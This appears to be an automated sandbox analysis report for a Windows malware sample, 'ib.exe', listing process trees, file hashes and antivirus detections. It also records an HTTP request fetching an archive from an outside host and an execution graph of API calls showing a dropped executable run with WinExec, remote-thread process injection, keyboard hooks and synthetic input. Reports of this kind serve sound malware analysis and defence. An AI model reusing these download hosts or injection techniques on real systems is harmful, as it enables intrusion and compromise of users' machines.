                                                                            0192.168.2.44973044.221.84.1057996996C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 26, 2024 13:52:03.786037922 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: ddos.dnsnb8.net:799
                                                                            Connection: Keep-Alive


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:07:52:02
                                                                            Start date:26/10/2024
                                                                            Path:C:\Users\user\Desktop\ib.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\ib.exe"
                                                                            Imagebase:0x3e0000
                                                                            File size:37'376 bytes
                                                                            MD5 hash:1913F1B56F94A777C0130EF6E358586F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:1
                                                                            Start time:07:52:02
                                                                            Start date:26/10/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:2
                                                                            Start time:07:52:02
                                                                            Start date:26/10/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            Imagebase:0xcb0000
                                                                            File size:15'872 bytes
                                                                            MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 97%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:07:52:08
                                                                            Start date:26/10/2024
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
                                                                            Imagebase:0xc70000
                                                                            File size:483'680 bytes
                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:25.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:30.9%
                                                                              Total number of Nodes:376
                                                                              Total number of Limit Nodes:11
                                                                              execution_graph 1440 3e2a7b _set_app_type 1464 3e3132 1440->1464 1442 3e2a88 _set_fmode 1465 3e2070 1442->1465 1444 3e2a93 __p__commode 1466 3e2ef4 1444->1466 1446 3e31a6 6 API calls 1447 3e2b25 1446->1447 1448 3e2aa3 __RTC_Initialize 1461 3e2b0f 1448->1461 1476 3e3081 1448->1476 1450 3e2abc 1451 3e2ac1 _configure_narrow_argv 1450->1451 1452 3e2acd 1451->1452 1451->1461 1479 3e3138 InitializeSListHead 1452->1479 1454 3e2ad2 1455 3e2adb __setusermatherr 1454->1455 1456 3e2ae6 1454->1456 1455->1456 1480 3e3147 _controlfp_s 1456->1480 1458 3e2af5 1459 3e2afa _configthreadlocale 1458->1459 1460 3e2b06 ___scrt_uninitialize_crt 1459->1460 1460->1461 1462 3e2b0a _initialize_narrow_environment 1460->1462 1461->1446 1463 3e2b1d 1461->1463 1462->1461 1464->1442 1465->1444 1467 3e2f04 1466->1467 1468 3e2f00 1466->1468 1469 3e2f73 1467->1469 1471 3e2f11 ___scrt_release_startup_lock 1467->1471 1468->1448 1470 3e31a6 6 API calls 1469->1470 1472 3e2f7a 1470->1472 1473 3e2f1e _initialize_onexit_table 1471->1473 1474 3e2f3c 1471->1474 1473->1474 1475 3e2f2d _initialize_onexit_table 1473->1475 1474->1448 1475->1474 1485 3e3054 1476->1485 1479->1454 1481 3e315f 1480->1481 1482 3e3160 1480->1482 1481->1458 1483 3e31a6 6 API calls 1482->1483 1484 3e3167 1483->1484 1484->1458 1486 3e306a _register_onexit_function 1485->1486 1487 3e3063 _crt_atexit 1485->1487 1488 3e3075 1486->1488 1487->1488 1488->1450 1489 3e2c7b 1498 3e32c6 GetModuleHandleW 1489->1498 1492 3e2cb9 _exit 1496 3e30e3 ___security_init_cookie 4 API calls 1492->1496 1493 3e2c87 1494 3e2c8d _c_exit 1493->1494 1495 3e2c92 1493->1495 1494->1495 1497 3e2cc7 __scrt_common_main_seh 1496->1497 1499 3e2c83 1498->1499 1499->1492 1499->1493 1358 3e37b7 1359 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1358->1359 1360 3e37c8 1359->1360 1361 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1360->1361 1362 3e37d2 1361->1362 1503 3e1670 1504 3e1682 1503->1504 1505 3e1a6d 1503->1505 1504->1505 1506 3e1731 mouse_event 1504->1506 1506->1504 1507 3e15f0 1508 3e15f6 1507->1508 1509 3e15fe 1507->1509 1510 3e2a41 free 1508->1510 1510->1509 1511 3e1ef0 1512 3e1fcb 1511->1512 1513 3e1f15 1511->1513 1514 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1512->1514 1524 3e22c0 1513->1524 1516 3e1fd8 1514->1516 1517 3e1f23 1517->1512 1518 3e1f2b SuspendThread WaitForSingleObject 1517->1518 1519 3e1f63 1518->1519 1520 3e1fb3 1519->1520 1523 3e2a41 free 1519->1523 1521 3e2a41 free 1520->1521 1522 3e1fbb ResumeThread 1521->1522 1522->1512 1523->1519 1525 3e22e8 OpenProcess 1524->1525 1528 3e22d5 1524->1528 1526 3e22fc VirtualAllocEx 1525->1526 1527 3e2350 GetLastError 1525->1527 1526->1527 1529 3e231b 1526->1529 1530 3e2369 1527->1530 1531 3e235c GetLastError 1527->1531 1528->1525 1528->1530 1529->1527 1533 3e2332 CreateRemoteThread 1529->1533 1530->1517 1532 3e2040 _printf __acrt_iob_func 1531->1532 1532->1530 1533->1527 1534 3e2377 WaitForSingleObject 1533->1534 1540 3e2070 1534->1540 1537 3e23a6 CloseHandle 1538 3e2a11 4 API calls 1537->1538 1539 3e23b9 1538->1539 1539->1517 1540->1537 1367 3e2b2e 1371 3e3308 SetUnhandledExceptionFilter 1367->1371 1369 3e2b33 1370 3e2b38 _set_new_mode 1369->1370 1371->1369 1550 3e2c67 _seh_filter_exe 1551 3e37e2 1552 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1551->1552 1553 3e37f3 1552->1553 1554 3e12e0 1555 3e12fa 1554->1555 1556 3e1383 SendInput 1554->1556 1555->1556 1104 3e1459 SetWindowsHookExA 1105 3e149c GetLastError 1104->1105 1106 3e146a GetLastError MessageBoxA 1104->1106 1109 3e151d UnhookWindowsHookEx 1105->1109 1113 3e14ab 1105->1113 1107 3e148d PostQuitMessage exit 1106->1107 1108 3e1529 1106->1108 1107->1105 1109->1108 1110 3e14c7 PeekMessageA 1111 3e14da TranslateMessage DispatchMessageA 1110->1111 1110->1113 1111->1113 1112 3e150c Sleep 1112->1110 1115 3e1519 1112->1115 1113->1110 1113->1112 1114 3e14fa SetCursorPos 1113->1114 1114->1112 1115->1109 1388 3e3314 1389 3e334b 1388->1389 1391 3e3326 1388->1391 1390 3e3353 __current_exception __current_exception_context terminate 1391->1389 1391->1390 1392 3e3415 1395 3e36ea 1392->1395 1396 3e3423 _except_handler4_common 1395->1396 1126 3e1050 1128 3e105c 1126->1128 1127 3e114d 1128->1127 1129 3e1132 Sleep 1128->1129 1130 3e10f6 SendInput 1128->1130 1129->1127 1129->1128 1130->1129 1397 3e2410 __std_exception_destroy 1398 3e242f 1397->1398 1399 3e2437 1397->1399 1400 3e2a41 free 1398->1400 1400->1399 1401 3e1610 1402 3e163a _Cnd_do_broadcast_at_thread_exit 1401->1402 1403 3e2a41 free 1402->1403 1404 3e1648 1403->1404 1405 3e1b10 1406 3e1b20 1405->1406 1407 3e2a11 4 API calls 1406->1407 1408 3e1b4f 1407->1408 1409 3e1b85 GetModuleHandleA 1408->1409 1410 3e1bcf GetProcAddress GetLastError 1409->1410 1411 3e1b9d GetLastError 1409->1411 1414 3e1bf7 1410->1414 1415 3e1bea GetLastError 1410->1415 1412 3e1bad GetLastError 1411->1412 1413 3e1d5d 1411->1413 1416 3e2040 _printf __acrt_iob_func 1412->1416 1418 3e2a11 4 API calls 1414->1418 1417 3e2040 _printf __acrt_iob_func 1415->1417 1419 3e1bba 1416->1419 1417->1414 1420 3e1c01 1418->1420 1421 3e2a11 4 API calls 1420->1421 1422 3e1c53 memset GetCurrentProcessId 1421->1422 1423 3e2a11 4 API calls 1422->1423 1424 3e1ce6 CreateThread 1423->1424 1425 3e2880 5 API calls 1424->1425 1426 3e2510 24 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 1424->1426 1425->1413 1561 3e2450 __std_exception_destroy 1563 3e23d0 __std_exception_copy 1428 3e1407 1429 3e140d 1428->1429 1430 3e142b CallNextHookEx 1428->1430 1429->1430 1431 3e1423 1429->1431 1570 3e1042 1571 3e104c 1570->1571 1572 3e1046 terminate 1570->1572 1572->1571 1116 3e9000 1118 3e9044 GetPEB 1116->1118 1122 3e9077 CreateFileA 1118->1122 1120 3e922d 1123 3e9246 WriteFile 1120->1123 1124 3e9244 1120->1124 1121 3e9265 1122->1120 1122->1121 1125 3e9255 CloseHandle WinExec 1123->1125 1124->1125 1125->1121 1131 3e2b40 1132 3e2b4c ___scrt_is_nonwritable_in_current_image 1131->1132 1155 3e2ebb 1132->1155 1134 3e2b53 1135 3e2cac 1134->1135 1138 3e2b7d 1134->1138 1179 3e31a6 IsProcessorFeaturePresent 1135->1179 1137 3e2cb3 exit 1139 3e2cb9 _exit 1137->1139 1140 3e2b81 _initterm_e 1138->1140 1146 3e2bca ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 1138->1146 1183 3e30e3 1139->1183 1142 3e2b9c 1140->1142 1143 3e2bad _initterm 1140->1143 1143->1146 1145 3e2c1e _get_initial_narrow_environment __p___argv __p___argc 1159 3e1dc0 1145->1159 1146->1145 1149 3e2c16 _register_thread_local_exe_atexit_callback 1146->1149 1149->1145 1156 3e2ec4 1155->1156 1187 3e3444 IsProcessorFeaturePresent 1156->1187 1158 3e2ed0 ___scrt_uninitialize_crt 1158->1134 1189 3e2000 CreateMutexA GetLastError 1159->1189 1163 3e1def 1212 3e1530 1163->1212 1166 3e1e13 1223 3e2a11 1166->1223 1170 3e1e58 1171 3e2a11 4 API calls 1170->1171 1172 3e1e6b 1171->1172 1245 3e1ea0 memset 1172->1245 1174 3e1e7e 1246 3e2080 1174->1246 1176 3e1e8a 1249 3e2100 1176->1249 1178 3e1e9b 1180 3e31bc 1179->1180 1181 3e31c8 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1180->1181 1182 3e32b2 1181->1182 1182->1137 1184 3e30f9 1183->1184 1186 3e2cc7 __scrt_common_main_seh 1184->1186 1357 3e3096 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1184->1357 1188 3e3468 1187->1188 1188->1158 1190 3e201c exit 1189->1190 1191 3e1dea 1189->1191 1190->1191 1192 3e1b20 1191->1192 1193 3e2a11 4 API calls 1192->1193 1194 3e1b4f 1193->1194 1195 3e1b85 GetModuleHandleA 1194->1195 1196 3e1bcf GetProcAddress GetLastError 1195->1196 1197 3e1b9d GetLastError 1195->1197 1200 3e1bf7 1196->1200 1201 3e1bea GetLastError 1196->1201 1198 3e1bad GetLastError 1197->1198 1199 3e1d5d 1197->1199 1257 3e2040 __acrt_iob_func 1198->1257 1199->1163 1204 3e2a11 4 API calls 1200->1204 1203 3e2040 _printf __acrt_iob_func 1201->1203 1203->1200 1206 3e1c01 1204->1206 1205 3e1bba 1205->1163 1207 3e2a11 4 API calls 1206->1207 1208 3e1c53 memset GetCurrentProcessId 1207->1208 1209 3e2a11 4 API calls 1208->1209 1210 3e1ce6 CreateThread 1209->1210 1253 3e2880 1210->1253 1267 3e2510 1210->1267 1213 3e2a11 4 API calls 1212->1213 1214 3e155f _beginthreadex 1213->1214 1215 3e158f 1214->1215 1216 3e15bb ?_Throw_Cpp_error@std@@YAXH 1214->1216 1217 3e159d ?_Throw_Cpp_error@std@@YAXH 1215->1217 1218 3e15a5 _Thrd_detach 1215->1218 1219 3e15ca 1216->1219 1217->1218 1218->1219 1220 3e15b4 ?_Throw_C_error@std@@YAXH 1218->1220 1221 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1219->1221 1220->1216 1222 3e15df KiUserCallbackDispatcher GetSystemMetrics 1221->1222 1222->1166 1224 3e2a23 malloc 1223->1224 1225 3e2a16 _callnewh 1224->1225 1226 3e1e44 1224->1226 1225->1224 1228 3e2a32 1225->1228 1231 3e1160 1226->1231 1227 3e2e23 1229 3e2e31 _CxxThrowException 1227->1229 1228->1227 1230 3e2e14 _CxxThrowException 1228->1230 1230->1227 1232 3e2a11 4 API calls 1231->1232 1233 3e11c6 _beginthreadex 1232->1233 1234 3e11f9 1233->1234 1235 3e1241 ?_Throw_Cpp_error@std@@YAXH 1233->1235 1236 3e120f _Thrd_detach 1234->1236 1237 3e1207 ?_Throw_Cpp_error@std@@YAXH 1234->1237 1238 3e1266 1235->1238 1239 3e126e 1235->1239 1240 3e121e ?_Throw_C_error@std@@YAXH 1236->1240 1241 3e1225 1236->1241 1237->1236 1242 3e2a41 free 1238->1242 1239->1170 1240->1241 1243 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1241->1243 1242->1239 1244 3e123d 1243->1244 1244->1170 1245->1174 1247 3e2a11 4 API calls 1246->1247 1248 3e20ae malloc 1247->1248 1248->1176 1250 3e2112 1249->1250 1343 3e2130 WSAStartup 1250->1343 1252 3e2119 Sleep 1252->1250 1254 3e28be 1253->1254 1259 3e2a03 1254->1259 1256 3e29de 1256->1199 1258 3e205f _printf 1257->1258 1258->1205 1260 3e2a0c IsProcessorFeaturePresent 1259->1260 1261 3e2a0b 1259->1261 1263 3e2d09 1260->1263 1261->1256 1266 3e2ccc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1263->1266 1265 3e2dec 1265->1256 1266->1265 1268 3e2547 GetForegroundWindow 1267->1268 1269 3e2557 GetWindowThreadProcessId 1268->1269 1270 3e2623 Sleep 1268->1270 1269->1270 1277 3e2574 1269->1277 1270->1268 1271 3e2a11 4 API calls 1271->1277 1272 3e2633 ?_Xlength_error@std@@YAXPBD 1274 3e2640 1272->1274 1273 3e2a11 4 API calls 1275 3e25dd CreateThread 1273->1275 1278 3e264d OpenProcess 1274->1278 1276 3e2619 CloseHandle 1275->1276 1275->1277 1311 3e2640 1275->1311 1276->1277 1277->1270 1277->1271 1277->1272 1277->1273 1279 3e26ad K32GetProcessImageFileNameA strstr 1278->1279 1280 3e268a 1278->1280 1281 3e2692 1279->1281 1295 3e26dc 1279->1295 1306 3e2a41 1280->1306 1283 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1281->1283 1285 3e26a7 1283->1285 1284 3e26f0 K32EnumProcessModulesEx 1286 3e285d 1284->1286 1284->1295 1287 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1286->1287 1290 3e286f 1287->1290 1288 3e27a0 Sleep 1288->1284 1289 3e27be 1288->1289 1292 3e2a41 free 1289->1292 1291 3e2730 K32GetModuleFileNameExA 1293 3e2845 1291->1293 1291->1295 1294 3e27cc 1292->1294 1296 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1293->1296 1298 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1294->1298 1295->1284 1295->1288 1295->1291 1299 3e2760 StrStrIA 1295->1299 1297 3e2857 1296->1297 1300 3e27e1 1298->1300 1299->1295 1301 3e27e7 1299->1301 1302 3e281d 1301->1302 1303 3e2817 ?_Xbad_function_call@std@ 1301->1303 1304 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1302->1304 1303->1302 1305 3e283f 1304->1305 1309 3e2e40 1306->1309 1308 3e2a4c 1308->1281 1309->1308 1310 3e3654 free 1309->1310 1341 3e3770 1311->1341 1314 3e26ad K32GetProcessImageFileNameA strstr 1316 3e2692 1314->1316 1330 3e26dc 1314->1330 1315 3e268a 1317 3e2a41 free 1315->1317 1318 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1316->1318 1317->1316 1320 3e26a7 1318->1320 1319 3e26f0 K32EnumProcessModulesEx 1321 3e285d 1319->1321 1319->1330 1322 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1321->1322 1325 3e286f 1322->1325 1323 3e27a0 Sleep 1323->1319 1324 3e27be 1323->1324 1327 3e2a41 free 1324->1327 1326 3e2730 K32GetModuleFileNameExA 1328 3e2845 1326->1328 1326->1330 1329 3e27cc 1327->1329 1331 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1328->1331 1333 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1329->1333 1330->1319 1330->1323 1330->1326 1334 3e2760 StrStrIA 1330->1334 1332 3e2857 1331->1332 1335 3e27e1 1333->1335 1334->1330 1336 3e27e7 1334->1336 1337 3e281d 1336->1337 1338 3e2817 ?_Xbad_function_call@std@ 1336->1338 1339 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1337->1339 1338->1337 1340 3e283f 1339->1340 1342 3e264d OpenProcess 1341->1342 1342->1314 1342->1315 1344 3e2183 socket 1343->1344 1345 3e2163 WSAGetLastError 1343->1345 1346 3e21b7 htons inet_addr setsockopt sendto 1344->1346 1347 3e2197 WSAGetLastError 1344->1347 1348 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1345->1348 1351 3e226f WSAGetLastError exit 1346->1351 1352 3e222a 1346->1352 1350 3e2a03 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 1347->1350 1349 3e217f 1348->1349 1349->1252 1353 3e21b3 1350->1353 1351->1352 1354 3e2230 recvfrom 1352->1354 1353->1252 1354->1352 1355 3e2252 WSAGetLastError 1354->1355 1355->1354 1356 3e225b sendto 1355->1356 1356->1351 1356->1354 1357->1186 1432 3e1000 1433 3e2a11 4 API calls 1432->1433 1434 3e1008 1433->1434 1435 3e1280 1436 3e12ad _Cnd_do_broadcast_at_thread_exit 1435->1436 1437 3e12ba 1436->1437 1438 3e12c2 1436->1438 1439 3e2a41 free 1437->1439 1439->1438 1573 3e3840 1574 3e2a41 free 1573->1574 1575 3e384b 1574->1575

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 3e9044-3e9074 GetPEB 1 3e9077-3e909a 0->1 2 3e909d-3e90a0 1->2 3 3e91ee-3e922b CreateFileA 2->3 4 3e90a6-3e90bc 2->4 21 3e922d-3e9230 3->21 22 3e9265-3e9269 3->22 5 3e90be-3e90c5 4->5 6 3e9110-3e9116 4->6 5->6 7 3e90c7-3e90ce 5->7 9 3e9118-3e911f 6->9 10 3e9129-3e912f 6->10 7->6 13 3e90d0-3e90d7 7->13 9->10 14 3e9121-3e9124 9->14 11 3e9148-3e914e 10->11 12 3e9131-3e9138 10->12 17 3e9167-3e916f 11->17 18 3e9150-3e9157 11->18 12->11 16 3e913a-3e9141 12->16 13->6 19 3e90d9-3e90dd 13->19 15 3e91bb-3e91c0 14->15 24 3e91c2-3e91c5 15->24 25 3e91e0-3e91e9 15->25 16->11 23 3e9143-3e9146 16->23 27 3e9188-3e918e 17->27 28 3e9171-3e9178 17->28 18->17 26 3e9159-3e9160 18->26 19->6 29 3e90df-3e90e3 19->29 30 3e9232-3e9238 21->30 23->15 24->25 31 3e91c7-3e91ca 24->31 25->2 26->17 32 3e9162-3e9165 26->32 35 3e91a7-3e91ad 27->35 36 3e9190-3e9197 27->36 28->27 33 3e917a-3e9181 28->33 29->15 34 3e90e9-3e910b 29->34 38 3e923a-3e9242 30->38 39 3e9246-3e9252 WriteFile 30->39 31->25 40 3e91cc-3e91cf 31->40 32->15 33->27 41 3e9183-3e9186 33->41 34->1 35->15 37 3e91af-3e91b6 35->37 36->35 42 3e9199-3e91a0 36->42 37->15 43 3e91b8 37->43 38->30 44 3e9244 38->44 45 3e9255-3e9262 CloseHandle WinExec 39->45 40->25 46 3e91d1-3e91d4 40->46 41->15 42->35 48 3e91a2-3e91a5 42->48 43->15 44->45 45->22 46->25 49 3e91d6-3e91d9 46->49 48->15 49->25 50 3e91db-3e91de 49->50 50->3 50->25
                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 003E9223
                                                                              • WriteFile.KERNELBASE(00000000,FFFF9A51,00003E00,?,00000000), ref: 003E9252
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 003E9256
                                                                              • WinExec.KERNEL32(?,00000005), ref: 003E9262
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateExecHandleWrite
                                                                              • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$hjErac.exe$lstr$odul
                                                                              • API String ID: 3741012433-2124918586
                                                                              • Opcode ID: 48a8c15285c83da8d9ea3a694ba2f85e4c028d6248d40bd10a5b8121fe4c6e81
                                                                              • Instruction ID: d6bd394da23225bb094fe3eea5441eea77fddf70166f99c629f797d5a33b31f1
                                                                              • Opcode Fuzzy Hash: 48a8c15285c83da8d9ea3a694ba2f85e4c028d6248d40bd10a5b8121fe4c6e81
                                                                              • Instruction Fuzzy Hash: 83613C74D0026ADBCF26CF96C848BADB7B5BF44311F1682ABD505AB681D3709E81CB91

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetForegroundWindow.USER32(027C55B8), ref: 003E2547
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 003E2563
                                                                              • CreateThread.KERNELBASE(00000000,00000000,003E2640,00000000,00000000,00000000), ref: 003E260F
                                                                              • CloseHandle.KERNEL32(00000000), ref: 003E261A
                                                                              • Sleep.KERNELBASE(000003E8), ref: 003E2628
                                                                              • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(list too long), ref: 003E2638
                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,?), ref: 003E2678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessThreadWindow$CloseCreateForegroundHandleOpenSleepXlength_error@std@@
                                                                              • String ID: Filter %s found!$devenv$list too long
                                                                              • API String ID: 219287018-55259838
                                                                              • Opcode ID: ba73e2daf9ad4a78120823e9701d08d94fd8bf4e9d4cf4bd77ae57fdc3630c4b
                                                                              • Instruction ID: a39b9c11646997021788064566e07884146dff693717034458eae96accd97a4d
                                                                              • Opcode Fuzzy Hash: ba73e2daf9ad4a78120823e9701d08d94fd8bf4e9d4cf4bd77ae57fdc3630c4b
                                                                              • Instruction Fuzzy Hash: 31A16271A002A9DFDB21DF56DC85BDAB7B8FF48710F0042A9E9499B291D7B09D84CB90

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSAStartup.WS2_32(00000202,?), ref: 003E2159
                                                                              • WSAGetLastError.WS2_32 ref: 003E2163
                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 003E2189
                                                                              • WSAGetLastError.WS2_32 ref: 003E2197
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$Startupsocket
                                                                              • String ID:
                                                                              • API String ID: 2817534722-0
                                                                              • Opcode ID: b0112a445aabfad8f52a9d7b75108aeffcc13ae1a80de4a8eec909f3fb8ad1ba
                                                                              • Instruction ID: 99a3296a01ebbdbfacdc93fe14af3442b71490a6e1f1b1d1ba987ce8d29459fe
                                                                              • Opcode Fuzzy Hash: b0112a445aabfad8f52a9d7b75108aeffcc13ae1a80de4a8eec909f3fb8ad1ba
                                                                              • Instruction Fuzzy Hash: 7541A1716007509BD7319F65DC4AF57BBE8FF5D720F100B19F6968A2E0D770A8848B61

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
                                                                              • GetLastError.KERNEL32 ref: 003E1BA3
